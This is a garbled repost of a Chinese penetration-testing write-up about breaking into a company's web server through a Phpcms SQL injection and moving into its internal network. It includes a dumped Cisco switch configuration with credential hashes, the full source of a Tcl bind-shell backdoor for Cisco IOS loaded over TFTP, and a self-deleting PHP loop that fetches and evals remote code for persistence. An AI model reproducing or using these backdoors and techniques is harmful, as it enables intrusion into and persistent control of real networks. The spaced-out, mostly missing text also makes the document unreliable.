[2384] 2015-10-21_知识|从某漏洞看内网信息探测和后渗透准备

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-16
2015-10-21_知识|从某漏洞看内网信息探测和后渗透准备 r e d r a i n   E   2 0 1 5 - 1 0 - 2 1 w e b u r l b i t . t c l . c o m g e t s h e l l p h p c m s P h p c m s   V 9   u c   a p i   S Q L g e t s h e l l s h e l l s y s t e m 1 0 . 4 . 2 2 0 x 0 0 h o s t s h o s t s 0 x 0 1 C 便 o r r e G e o r g h t t p s : / / g i t h u b . c o m / s e n s e p o s t / r e G e o r g r e g e r o g r e g e o r g u r l l i b 3 n m a p 使 p r o x y c h a i n s w i n   使 p r o x y c a p
2 3 3 3 p r o x y c h a i n s c o n f C 0 x 0 2 n m a p w e b 访 1 1 1 2 1 3 c i s c o w e b c i s c o c i s c o w e b w e b 1 c i s c o 7   1 5 1 5 i o s
i O S c i s c o w e b p r i v i l e g e 1 5 p r i v i l e g e 1 5 t e l n e t
p r i v i l e g e 1 5 D Z S W - 3 5 6 0 - A # e n e n D Z S W - 3 5 6 0 - A # s h o w   r u n n i n g - c o n f i g s h o w   r u n n i n g - c o n f i g B u i l d i n g   c o n f i g u r a t i o n . . . C u r r e n t   c o n f i g u r a t i o n   :   3 6 7 8   b y t e s ! v e r s i o n   1 2 . 2 n o   s e r v i c e   p a d s e r v i c e   t i m e s t a m p s   d e b u g   u p t i m e s e r v i c e   t i m e s t a m p s   l o g   u p t i m e s e r v i c e   p a s s w o r d - e n c r y p t i o n ! h o s t n a m e   D Z S W - 3 5 6 0 - A ! e n a b l e   p a s s w o r d   7   1 2 1 A 0 C 0 4 1 1 0 4 ! u s e r n a m e   a d m i n   p r i v i l e g e   1 5   p a s s w o r d   7   1 5 4 3 5 9 5 F 5 0 7 F 7 D n o   a a a   n e w - m o d e l s y s t e m   m t u   r o u t i n g   1 5 0 0 v t p   m o d e   t r a n s p a r e n t i p   s u b n e t - z e r o i p   r o u t i n g ! ! ! ! - - M o r e - - ! ! n o   f i l e   v e r i f y   a u t o s p a n n i n g - t r e e   m o d e   p v s t s p a n n i n g - t r e e   e x t e n d   s y s t e m - i d ! v l a n   i n t e r n a l   a l l o c a t i o n   p o l i c y   a s c e n d i n g !
v l a n   2 1 8 n a m e   C a l l _ C e n t e r ! v l a n   2 2 0 ! v l a n   2 2 2 n a m e   W E B ! v l a n   2 2 3 n a m e   D B ! ! i n t e r f a c e   P o r t - c h a n n e l 1 s w i t c h p o r t   t r u n k   e n c a p s u l a t i o n   d o t 1 q s w i t c h p o r t   m o d e   t r u n k ! i n t e r f a c e   P o r t - c h a n n e l 2 d e s c r i p t i o n   C o n n e c t _ T o _ Y D B F Z X - C 3 7 5 0 _ P o 1 n o   s w i t c h p o r t i p   a d d r e s s   1 0 . 6 8 . 3 . 2   2 5 5 . 2 5 5 . 2 5 5 . 2 5 2 ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 1 s w i t c h p o r t   a c c e s s   v l a n   2 1 8 s w i t c h p o r t   m o d e   a c c e s s ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 2 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 3 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 4 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 5 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 6 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 7 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 8 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s
! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 9 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s ! i n t e r f a c e   G i g a b i t E t h e r n e t 0 / 1 0 s w i t c h p o r t   a c c e s s   v l a n   2 2 2 s w i t c h p o r t   m o d e   a c c e s s ! D B v l a n w e b   v l a n = = = = = = = = = = = = = = = = = = = 线 = = = = = = = = = = = = = = = = = = w e b   v l a n v l a n 西 z 8 G R E 1 G R E   G R E 使   h t t p : / / i t c h e n y i . b l o g . 5 1 c t o . c o m / 4 7 4 5 6 3 8 / 1 1 3 7 1 4 3 h t t p : / / w w w . c o d e s k y . n e t / a r t i c l e / 2 0 1 2 0 7 / 1 7 1 4 6 1 . h t m l G R E v l a n 线 c a l l _ c e n t e r v l a n 线 便 c i s c o c i s c o T C L   c i s c o #   T c l S h e l l . t c l   v 0 . 1   b y   A n d y   D a v i s ,   I R M   2 0 0 7 # #   I R M   a c c e p t s   n o   r e s p o n s i b i l i t y   f o r   t h e   m i s u s e   o f   t h i s   c o d e #   I t   i s   p r o v i d e d   f o r   d e m o n s t r a t i o n   p u r p o s e s   o n l y
p r o c   c a l l b a c k   { s o c k   a d d r   p o r t }   { f c o n f i g u r e   $ s o c k   - t r a n s l a t i o n   l f   - b u f f e r i n g   l i n e p u t s   $ s o c k   "   " p u t s   $ s o c k   " - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - " p u t s   $ s o c k   " T c l S h e l l   v 0 . 1   b y   A n d y   D a v i s ,   I R M   2 0 0 7 " p u t s   $ s o c k   " - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - - - | - " p u t s   $ s o c k   "   " s e t   r e s p o n s e   [ e x e c   " s h   v e r   |   i n c   I O S " ] p u t s   $ s o c k   $ r e s p o n s e s e t   r e s p o n s e   [ e x e c   " s h   p r i v " ] p u t s   $ s o c k   $ r e s p o n s e p u t s   $ s o c k   "   " p u t s   $ s o c k   " E n t e r   I O S   c o m m a n d : " f i l e e v e n t   $ s o c k   r e a d a b l e   [ l i s t   e c h o   $ s o c k ] } p r o c   e c h o   { s o c k }   { g l o b a l   v a r i f   { [ e o f   $ s o c k ]   | |   [ c a t c h   { g e t s   $ s o c k   l i n e } ] }   { }   e l s e   { s e t   r e s p o n s e   [ e x e c   " $ l i n e " ] p u t s   $ s o c k   $ r e s p o n s e } } s e t   p o r t   1 2 3 4 s e t   s h   [ s o c k e t   - s e r v e r   c a l l b a c k   $ p o r t ] v w a i t   v a r c l o s e   $ s h t c l s h R o u t e r # t c l s h R o u t e r ( t c l ) # s o u r c e   t f t p : / / x . x . x . x / b a c k d o o r . t c l n c   i p   1 2 3 4 o k w e b w e b p h i n t h o n p h p . i n i u s e r . i n i p h p . u s e r . i n i a u t o _ p r e p e n d _ f i l e = x x x . g i f ( p n g / j p g ) x x x . g i f h t t p : / / d r o p s . w o o y u n . o r g / t i p s / 3 4 2 4
< ? p h p u n l i n k ( $ _ S E R V E R [ ' S C R I P T _ F I L E N A M E ' ] ) ; i g n o r e _ u s e r _ a b o r t ( t r u e ) ; s e t _ t i m e _ l i m i t ( 0 ) ; $ r e m o t e _ f i l e   =   ' h t t p : / / x x x / x x x . t x t ' ; w h i l e ( $ c o d e   =   f i l e _ g e t _ c o n t e n t s ( $ r e m o t e _ f i l e ) ) { @ e v a l ( $ c o d e ) ; s l e e p ( 5 ) ; } ; ? > x x x . t x t 访 t x t l i n u x c r o n t a b
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则